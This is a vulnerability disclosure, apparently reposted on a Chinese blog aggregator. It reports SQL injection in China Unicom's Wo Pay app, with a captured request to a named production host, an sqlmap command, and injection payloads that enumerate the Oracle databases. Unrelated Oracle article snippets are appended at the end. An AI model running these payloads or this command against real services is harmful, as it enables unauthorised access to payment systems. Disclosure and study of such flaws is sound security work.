oracle注射,中国联通沃支付一处Oracle数据库注射
打开从豌豆荚应用商店下载的"沃支付"APP,抓包发现这么一条请求code 区域POST /payFront2/recommend.action?operation=CX10 HTTP/1.1
content-type: text/xml
Accept-Charset: GB2312
contentType: GB2312
SignatureCharacter: c691b17a0cf059741addc0a597ed1789f2593f0d
CookieSafeStr: -1|b12e9d62f3fd2fd5cc993b765fc47e28
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.2.2; virtual machine Build/JDQ39E)
Host: cellphonefront.unicompayment.com:55352
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 334
<?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0*0000000000000002CX10main
其中,2.1.0参数存在SQL注射。漏洞证明:
code 区域sqlmap.py -r e:\1.txt --force-ssl --skip-urlencode --dbs
code 区域sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 1553=1553 AND 'gdbh'='gdbh0000000000000002CX10main
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' UNION ALL SELECT NULL,NULL,NULL,CHR(113)||CHR(111)||CHR(115)||CHR(105)||CHR(113)||CHR(72)||CHR(107)||CHR(72)||CHR(75)||CHR(84)||CHR(65)||CHR(72)||CHR(77)||CHR(86)||CHR(80)||CHR(113)||CHR(104)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL FROM DUAL-- 0000000000000002CX10main
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: <?xml version="1.0" encoding="GB2312" standalone="yes" ?>2.1.0' AND 6395=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'KtUw'='KtUw0000000000000002CX10main
---
back-end DBMS: Oracle
available databases [6]:
[*] CELLPHONE_FRONT
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] XDB
修复方案:
联通更专业
oracle注射,中国联通沃支付一处Oracle数据库注射相关推荐
- Oracle 的成功无法复制,国产数据库该如何突破?
中国数据库发展的黄金期,开源开放才是最有效的手段. 整理 | 屠敏 出品 | CSDN(ID:CSDNnews) 互联网的发展打破了信息的隔阂,数据量的爆发催生了基础性软件数据库的应用.从中国数据库市 ...
- oracle实例包括用户进程吗,ORACLE实例和ORACLE数据库详解(三)
e.PMON:负责在一个Oracle进程失败时清理资源. 主要用于清除失效的用户进程,释放用户进程所用的资源.如PMON将回滚未提交的工作,释放锁,释放分配给失败进程的SGA资源. f.CKPT 同步 ...
- tomcat 连接oracle重连,JSP+Tomcat连接Oracle数据库
1. 首先安裝JDK 1.4.2_01 ,http://java.sun.com/j2se/2. 接著安裝Oracle9i, 安裝完成之後先更改XML Database的參數 ...
- Java JDBC连接oracle、SQL server、My Sql数据库的驱动
JAVA创建以JDBC连接数据库的程序 ①加载JDBC驱动程序: 1.oracle---------JDBC try{//加载oracle的驱动类Class.forName("oracle. ...
- oracle误删表空间 无法关闭,oracle 误删表空间文件启动不了数据库的解决办法
近日在搞rman备份恢复的实验,因为在虚拟机建立一个rman表空间,但是发现磁盘空间不够大,所以删除了,导致数据库启动不了了,解决办法如下: 1.误删rman表空间 SQL> ! rm -f / ...
- oracle 64位客户端_LabVIEW读取Oracle数据库-开题
最近做一个项目,工厂客户使用的Mes数据库是Oracle. 以前做医院摆药机系统时,和His对接用过Oracle数据库,主要用视图交互数据.然后,好久没有再使用过. 这次使用Oracle的时候,有几个 ...
- 数据如何导入oracle数据库,如何用Oracle导入导出工具来实现Oracle数据库移植?
Oracle数据库作为目前市场的主流数据库之一,许多应用都在其上进行开发,由于Oracle数据库更新换代的原因和不同的应用程序提供商,可能会造成在一个单位的应用中存在Oracle的几种版本,如Orac ...
- oracle转64编码,[转]将oracle数据库的编码变成utf-8
1.改客户端字符集:通过WINDOWS的运行菜单运行Regedit,修改注册表 Start -> Run -> Rededit Under registry Editor - > H ...
- oracle9i 恢复数据库,oracle 9i使用闪回查询恢复数据库误删问题
如果用户误删/更新了数据后,作为用户并没有什么直接的方法来进行恢复,他们必须求助DBA来对数据库进行恢复,到了Oracle9i,这一个难堪局面有所改善.Oracle 9i中提供了一项新的技术手段--闪 ...
- oracle 导库时日志满了,oracle rac 11g 日志占满系统盘导致数据库down掉
oracle日志占满系统盘满了导致数据库挂掉 并且archivelog日志也满了倒是数据库无法open,无法登陆,幸好还可以到mount状态.解决办法: 1.根据报错查看 表象: crs 服务down ...
最新文章
- 干货!任正非对话美国科技思想家,都说了些什么
- 微软想通了:Skepe正式默认隐藏IP地址
- 解密回声消除技术之一(理论篇)
- 第一个程序实现登录功能,密码输错三次封账号。
- 简单的Tab切换组件
- etcd安装及go简单操作
- python 面向对象实现CNN(四)
- php网站后台密码加密,thinkphp 后台登陆密码加密传入密钥
- 倒水问题(Fill,UVA 10603) lrj白书 p202
- ThreadLocal用法详解和原理
- 网关到底是什么?协议转换器是网关吗?
- 对象的释放Dispose和Close对比
- html 图片墙效果,基于html5实现的图片墙效果
- vi 编辑意外中断处理办法
- 五子棋小游戏(C++)
- 发现一个有意思的英文期刊 China and the World Ancient and Modern Silk Road
- android通讯录管理软件,号簿管理更轻松 Android通讯录软件合集
- S3C2410,ARM920T,试题总结
- Perl Learning 3 Subroutine
- STM32复习笔记(五) —— GPIO锁定机制
热门文章
- vim替换字符串带斜杠_vim替换命令
- LiveGBS国标GB/T28181|GB35114流媒体服务(LiveSMS)如何配置节点集群
- GB35114---认证报告
- 【Ansys Workbench】—响应面优化操作步骤
- Linux 二进制分析
- (测试可用)针式打印机打印WEB页面字体不清晰,解决方法
- spotify电脑下载歌曲_Spotify Music Converter mac版下载
- php网页找注入点,另类找注入点技巧_91Ri.org
- 手机端通讯录制作,字母索引查找
- 2008年希赛软考学院招生